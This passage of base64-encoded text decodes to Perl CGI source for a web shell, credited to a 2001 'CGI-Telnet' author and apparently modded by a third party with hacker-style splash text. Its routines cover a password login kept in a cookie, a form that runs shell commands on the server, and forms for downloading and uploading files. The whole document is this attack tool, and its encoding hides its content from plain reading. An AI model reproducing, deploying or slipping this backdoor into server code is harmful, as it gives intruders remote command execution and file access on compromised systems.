S0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCglwcmludCA8PEVORDsKPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4KICAgIHJldHVybjsKICB9CiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsKICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsKICB0aGlzLmludGVydmFsID0gKHR5cGVvZiBpbnRlcnZhbCA9PSAidW5kZWZpbmVkIiA/IDEwMCA6IGludGVydmFsKTsKICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsKICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0OwogIHRoaXMuY3Vyc29yID0gKGN1cnNvciA/IGN1cnNvciA6ICIiKTsKICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7CiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgdGhpcy5lbGVtZW50LnR5cGluZ1RleHQgPSB0aGlzOwogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsKICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOwogIHRoaXMucnVubmluZyA9IGZhbHNlOwogIHRoaXMuaW5UYWcgPSBmYWxzZTsKICB0aGlzLnRhZ0J1ZmZlciA9ICIiOwogIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7Cn0KVHlwaW5nVGV4dC5hbGwgPSBuZXcgQXJyYXkoKTsKVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOwpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgewogIGZvcih2YXIgaSA9IDA7IGkgPCBUeXBpbmdUZXh0LmFsbC5sZW5ndGg7IGkrKykgVHlwaW5nVGV4dC5hbGxbaV0ucnVuKCk7Cn0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7CiAgaWYodGhpcy5ydW5uaW5nKSByZXR1cm47CiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuCiAgICByZXR1cm47CiAgfQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsKLy8gIHRoaXMub3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0LnJlcGxhY2UoLzwoW148XSkqPi8sICIiKTsgICAgIC8vIFN0cmlwIEhUTUwgZnJvbSB0ZXh0LgogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgewogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7CiAgICAgIHRoaXMudGFnQnVmZmVyID0gIjwiOwogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gIj4iOwogICAgICB0aGlzLmluVGFnID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiYiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gIjsiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOwogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSB7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICB9CiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsKICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgKz0gKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCAtIDEgPyAodHlwZW9mIHRoaXMuY3Vyc29yID09ICJmdW5jdGlvbiIgPyB0aGlzLmN1cnNvcih0aGlzLmN1cnJlbnRUZXh0KSA6IHRoaXMuY3Vyc29yKSA6ICIiKTsKICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsKICB9IGVsc2UgewoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOwoJdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgICAgICAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7CiAgfQp9Cjwvc2NyaXB0Pgo8L3ByZT4KCjxmb250IHN0eWxlPSJmb250OiAxNXB0IFZlcmRhbmE7IGNvbG9yOiB5ZWxsb3c7Ij5Db3B5cmlnaHQgKEMpIDIwMDEgUm9oaXRhYiBCYXRyYSA8L2ZvbnQ+PGJyPjxicj4KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+Cjx0Ym9keT48dHI+Cjx0ZCB2YWxpZ249InRvcCIgYmFja2dyb3VuZD0iaHR0cDovL2RsLmRyb3Bib3guY29tL3UvMTA4NjAwNTEvaW1hZ2VzL21hdHJhbi5naWYiPjxwIGlkPSJoYWNrIiBzdHlsZT0ibWFyZ2luLWxlZnQ6IDNweDsiPgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4KCjxmb250IGNvbG9yPSIjMDA5OTAwIj4gVHJ5aW5nIGNvbm5lY3QgdG8gU2VydmVyIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4KPGZvbnQgY29sb3I9IiMwMDk5MDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+IENoZWNraW5nIFNlcnZlciAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuPC9mb250PiA8YnI+Cgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgoKPGZvbnQgY29sb3I9IiNGMDAwMDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+XCQgQ29ubmVjdGVkIENvbW1hbmQhIDwvZm9udD48YnI+Cjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0shIFlvdSBjYW4ga2lsbCBpdCE8L2ZvbnQ+CjwvdHI+CjwvdGJvZHk+PC90YWJsZT4KPGJyPgoKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsKVHlwaW5nVGV4dC5ydW5BbGwoKTsKCjwvc2NyaXB0PgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEFkZCBodG1sIHNwZWNpYWwgY2hhcnMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsKCW15ICR0ZXh0ID0gc2hpZnQ7CgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsKCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsKCSR0ZXh0ID1+IHMvJy8mIzAzOTsvZzsKCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7CgkkdGV4dCA9fiBzLz4vJmd0Oy9nOwoJcmV0dXJuICR0ZXh0Owp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBBZGQgbGluayBmb3IgZGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEFkZExpbmtEaXIoJCkKewoJbXkgJGFjPXNoaWZ0OwoJbXkgQGRpcj0oKTsKCWlmKCRXaW5OVCkKCXsKCQlAZGlyPXNwbGl0KC9cXC8sJEN1cnJlbnREaXIpOwoJfWVsc2UKCXsKCQlAZGlyPXNwbGl0KCIvIiwmdHJpbSgkQ3VycmVudERpcikpOwoJfQoJbXkgJHBhdGg9IiI7CglteSAkcmVzdWx0PSIiOwoJZm9yZWFjaCAoQGRpcikKCXsKCQkkcGF0aCAuPSAkXy4kUGF0aFNlcDsKCQkkcmVzdWx0Lj0iPGEgaHJlZj0nP2E9Ii4kYWMuIiZkPSIuJHBhdGguIic+Ii4kXy4kUGF0aFNlcC4iPC9hPiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGJyPkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KClBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRm9ybQp7CglwcmludCA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2FpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9nb3V0CnsKCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUKCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCSZQcmludExvZ291dFNjcmVlbjsKCgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7CglleGl0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdAojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0CiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyCiMgdG8gbG9naW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ2luIAp7CglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZAoJewoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7CgkJJlByaW50UGFnZUhlYWRlcjsKCQlwcmludCAmTGlzdERpcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoKCQl9CgkJJlByaW50TG9naW5Gb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJZXhpdDsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgokUHJvbXB0CjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI1MCIgbmFtZT0iYyI+CjxpbnB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQp7CglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IAoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+CiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IGNsYXNzPSJmaWxlIiB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+Cgo8L2Zvcm0+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0KewoJbXkgJGRpcj0gJkFkZExpbmtEaXIoInVwbG9hZCIpOwoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CiRQcm9tcHQgdXBsb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCBjbGFzcz0iZmlsZSIgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+ClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4KCjwvZm9ybT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBDb21tYW5kVGltZW91dAp7CglpZighJFdpbk5UKQoJewoJCWFsYXJtKDApOwoJCXJldHVybiA8PEVORDsKPC90ZXh0YXJlYT4KPGJyPjxmb250IGNvbG9yPXllbGxvdz4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLjwvZm9udD4KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250PgpFTkQKCX0KfQoKCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0